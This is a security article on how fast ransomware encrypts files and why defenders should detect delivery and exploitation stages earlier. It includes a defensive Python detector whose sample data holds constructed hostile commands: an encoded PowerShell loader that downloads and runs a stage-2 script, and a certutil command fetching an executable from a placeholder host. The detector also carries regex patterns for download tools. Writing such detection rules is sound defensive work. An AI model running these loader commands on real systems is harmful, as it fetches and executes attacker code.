Why Faster Ransomware Means Defenders Must Shift Left on the Cyber Kill Chain

Phil Muncaster

We all know ransomware is among the top threats facing today’s organizations. Whether you’re a provider of critical national infrastructure or a regular SMB, there’s increasingly nowhere to hide. The advent of ransomware-as-a-service and the affiliate model has led to an explosion in the number of threat groups successfully monetizing attacks. The bad news is that the developers behind the malware they use are constantly innovating. A recent Splunk report reveals that some variants can encrypt 100,000 files in as little as five minutes.


If nothing else, this should dispel any notion that network defenders can reliably stop an attack once encryption is under way. The focus must be on prevention and rapid detection at a much earlier stage in the so-called “cyber kill chain.”

The impact of ransomware

It can be difficult to accurately measure the true impact of ransomware on global organizations. The official FBI estimate for 2021 was losses of just over $49m, based on only 3,729 ransomware complaints. It’s clear that many breached organizations still aren’t reporting incidents, something that should change with a new bill making its way through Congress. The FBI also admits that its estimate doesn’t include things like lost business, time, wages, equipment, or third-party incident response services. All of these can cost organizations dearly.


However, when a single attack is reported to have cost one business process outsourcing giant as much as $42m, and when one ransomware group is able to spend millions on staff salaries, tools, and services each year, it’s clearly a highly lucrative industry. A separate study from Palo Alto Networks, for example, claimed that average ransom payments last year surged to $541,000.

What the Splunk test reveals

With so much at stake, it’s perhaps not surprising that the bad guys are always looking for ways to gain a competitive advantage. One such way is to accelerate the time it takes to encrypt all of a victim organization’s files, which reduces the window in which defenders can stop an attack before it’s too late and increases the likelihood of the victim paying a ransom.


Splunk analyzed 10 ransomware variants and found that the median time taken to encrypt 100,000 files, or 53GB, stood at just 43 minutes. Some variants took far less: LockBit was the fastest at under six minutes. Babuk took around a minute longer, and then came Avaddon (13 minutes) and Ryuk (14 minutes). Given that the average organization in the Americas takes three full days to detect ransomware on its networks, the advantage clearly lies with the attackers. As Splunk argues:

“The average median duration demonstrates a limited window of time to respond to a ransomware attack once the encryption process is underway. This can prove even more limiting considering that the catastrophic apex may be when a single critical file is encrypted, rather than the whole of the victim’s data. With such factors in play, it may prove to be extremely difficult, if not impossible, for the majority of organizations to mitigate a ransomware attack once the encryption process begins.”

Spotting threats earlier

The key therefore is for organizations to get better at stopping ransomware threats earlier on in the cyber kill chain—a model first devised by Lockheed Martin to describe the various stages of an advanced attack. These are:

  1. Reconnaissance – including harvesting of email addresses. 
  2. Weaponization – coupling an exploit with a backdoor into a payload.
  3. Delivery – delivering that payload via email, web, and other channels.
  4. Exploitation – exploiting a vulnerability to execute malicious code on the victim’s system.
  5. Installation – installing malware on an IT asset.
  6. Command & Control – opening comms channels for remote manipulation of the victim.
  7. Actions on objectives – accomplishing original goals with remote access to the victim system.

If the actions-on-objectives phase is where the actual encryption of assets happens, organizations must intervene earlier in the kill chain to prevent an attack from reaching that stage. According to Splunk, this means focusing on stages three and four: delivery and exploitation.


This is certainly possible, by taking measures such as:

  • Email security to detect malicious payloads.
  • Improved staff training to help spot phishing emails.
  • A risk-based patching program to remediate vulnerabilities before they can be exploited. 
  • Detection and response tools at the endpoint (EDR), and across the IT environment (XDR) to spot suspicious behavior before malware is installed.
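The last two items above are where detection engineering earns its keep: a document-handling application spawning a script interpreter, or an encoded PowerShell command that fetches a second stage, is delivery- and exploitation-stage behaviour that shows up in process-creation telemetry hours or days before any file is encrypted. The script below is an added example written for this page, not code from Splunk or the article's author. It runs a few such rules over constructed process-creation records (the log lines, hostnames, paths and URLs are all made up; the field names `parent_image`, `image` and `command_line` are assumed to mirror a Sysmon Event ID 1-style record exported as JSON). PowerShell's `-EncodedCommand` payload is base64 over UTF-16LE, so the detector decodes it before matching.

```python
"""Flag delivery/exploitation-stage behaviour in process-creation events.

Added example for this page. SAMPLE_EVENTS is constructed test data, not
telemetry from any real incident; field names are assumed to follow a
Sysmon Event ID 1-style record exported as one JSON object per line.
"""
import base64
import json
import ntpath
import re

# Document-handling applications that should almost never launch an interpreter.
DOC_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
# Script hosts and living-off-the-land binaries typically used as the first stage.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Common ways a first stage pulls a second stage from the network.
DOWNLOAD_HINT = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|bitsadmin"
    r"|certutil\b.*-urlcache|\bmshta\b.*https?://"
)


def _basename(path):
    # ntpath handles Windows paths regardless of the platform the detector runs on.
    return ntpath.basename(path).lower()


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or None if there is none.

    PowerShell expects the argument to be base64 of the UTF-16LE script text.
    """
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return the list of reasons an event looks like early-stage ransomware activity."""
    parent = _basename(event["parent_image"])
    child = _basename(event["image"])
    cmd = event.get("command_line", "")
    reasons = []
    if parent in DOC_PARENTS and child in INTERPRETERS:
        reasons.append(f"document app {parent} spawned {child}")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        if DOWNLOAD_HINT.search(decoded):
            reasons.append("decoded command fetches remote content")
    if DOWNLOAD_HINT.search(cmd):
        reasons.append("command line fetches remote content")
    return reasons


def detect(log_lines):
    """Run score_event over JSON log lines; return one alert per suspicious event."""
    alerts = []
    for line in log_lines:
        event = json.loads(line)
        reasons = score_event(event)
        if reasons:
            alerts.append({"host": event["host"], "pid": event["pid"],
                           "image": _basename(event["image"]), "reasons": reasons})
    return alerts


# Constructed stage-2 loader; encoded the way PowerShell's -EncodedCommand expects.
STAGE2_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED_STAGE2 = base64.b64encode(STAGE2_COMMAND.encode("utf-16le")).decode("ascii")

OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"host": "ws01", "pid": 4120, "parent_image": r"C:\Windows\explorer.exe",
     "image": OFFICE + r"\WINWORD.EXE",
     "command_line": r'WINWORD.EXE /n "C:\Users\alice\Downloads\invoice.docm"'},
    {"host": "ws01", "pid": 4188, "parent_image": OFFICE + r"\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED_STAGE2}"},
    {"host": "ws02", "pid": 5520, "parent_image": OFFICE + r"\OUTLOOK.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c certutil -urlcache -split -f http://example.invalid/p.exe %TEMP%\p.exe"},
    {"host": "ws03", "pid": 6001, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c ipconfig /all"},
    {"host": "ws03", "pid": 6002, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "command_line": "svchost.exe -k netsvcs"},
]]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['host']} pid={alert['pid']} {alert['image']}: {'; '.join(alert['reasons'])}")
```

Only the two events with a document application as parent trip the rules; an administrator's `cmd.exe /c ipconfig /all` launched from Explorer and a normal `services.exe` to `svchost.exe` chain pass through. The point is that these signals appear at Splunk's stages three and four, long before the 43-minute encryption clock starts, which is exactly where the article says detection effort belongs.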

Even by the FBI’s conservative estimates, losses to ransomware soared 449% between 2019 and 2021, while the volume of reports surged 82%. To avoid becoming the next victim, it makes sense to double down on prevention, detection, and response early in the kill chain. Because once that ransomware payload is activated, there may not be much time left.
